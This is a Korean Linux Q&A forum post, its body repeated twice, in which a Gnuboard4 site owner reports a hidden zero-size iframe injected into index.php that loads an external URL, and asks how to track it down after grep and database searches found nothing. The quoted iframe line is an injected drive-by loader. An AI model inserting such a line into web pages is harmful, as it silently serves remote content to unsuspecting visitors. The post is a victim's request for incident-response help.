질문&답변
클라우드/리눅스에 관한 질문과 답변을 주고 받는 곳입니다.
리눅스 분류

웹해킹을 당한듯 합니다.

작성자 정보

  • 웨디 작성
  • 작성일

컨텐츠 정보

본문

index.php파일에

<iframe src='http://seoholo.cafe24.com/mm/' width=0 height=0>  의 내용이 들어가면서 빈페이지가 나오네요..

index.php파일에서 서브폴더의 main.php파일을 불러오거든요..

파일들을 뒤져보고 있지만 해당 문장은 없거든요..

해당폴더에 가서 find . -type f | xargs grep "seoholo" 으로 검색했는데 암것도 안나오네요..

이게 DB에 입력된걸까요? 메인이 나왔다 안나왔다 하다가 지금은 또 잘나오고..

미치겠습니다. 이거 어디부터 들여다 봐야 할런지..

해당 DB의 게시판관련 테이블의 subject와 content 제목과 내용에서 위의 seoholo을 like "%seoholo%"으로 검색했는데 안나오는군요..  어디에 스크립트로 박혀있나 싶어 스크립트를 찾아보고 있지만 너무 많군요.. ㅜ.ㅜ

 

리눅스서버는 우선 제 계정으로만 ssh로그인이 되며 해당계정의비번은 자주 바꾸고있구요.

제 계정으로만 root로 접속할수 있도록 해놨습니다.

접속로그에는 기록이 없어서 웹해킹같다고 말한겁니다.

보드는 그누보드4를 사용하고 있습니다.

 

이게 발생한지 1주일가량 되었는데요 초기 발생시 ssu를 깔긴했는데 발생이후라서 변조된파일에는 나타나질 않아요.. 모든 파일을 뒤져보는 수밖에 없을까요?

어떤식으로 검색해 나가야할지 방향을 못잡겠습니다..

index.php파일에서 서브폴더의 main.php파일을 불러오거든요..

파일들을 뒤져보고 있지만 해당 문장은 없거든요..

해당폴더에 가서 find . -type f | xargs grep "seoholo" 으로 검색했는데 암것도 안나오네요..

이게 DB에 입력된걸까요? 메인이 나왔다 안나왔다 하다가 지금은 또 잘나오고..

미치겠습니다. 이거 어디부터 들여다 봐야 할런지..

해당 DB의 게시판관련 테이블의 subject와 content 제목과 내용에서 위의 seoholo을 like "%seoholo%"으로 검색했는데 안나오는군요..  어디에 스크립트로 박혀있나 싶어 스크립트를 찾아보고 있지만 너무 많군요.. ㅜ.ㅜ

 

리눅스서버는 우선 제 계정으로만 ssh로그인이 되며 해당계정의비번은 자주 바꾸고있구요.

제 계정으로만 root로 접속할수 있도록 해놨습니다.

접속로그에는 기록이 없어서 웹해킹같다고 말한겁니다.

보드는 그누보드4를 사용하고 있습니다.

 

이게 발생한지 1주일가량 되었는데요 초기 발생시 ssu를 깔긴했는데 발생이후라서 변조된파일에는 나타나질 않아요.. 모든 파일을 뒤져보는 수밖에 없을까요?

어떤식으로 검색해 나가야할지 방향을 못잡겠습니다..

 


관련자료

댓글 0
등록된 댓글이 없습니다.

공지사항


뉴스광장


  • 현재 회원수 :  60,017 명
  • 현재 강좌수 :  35,690 개
  • 현재 접속자 :  240 명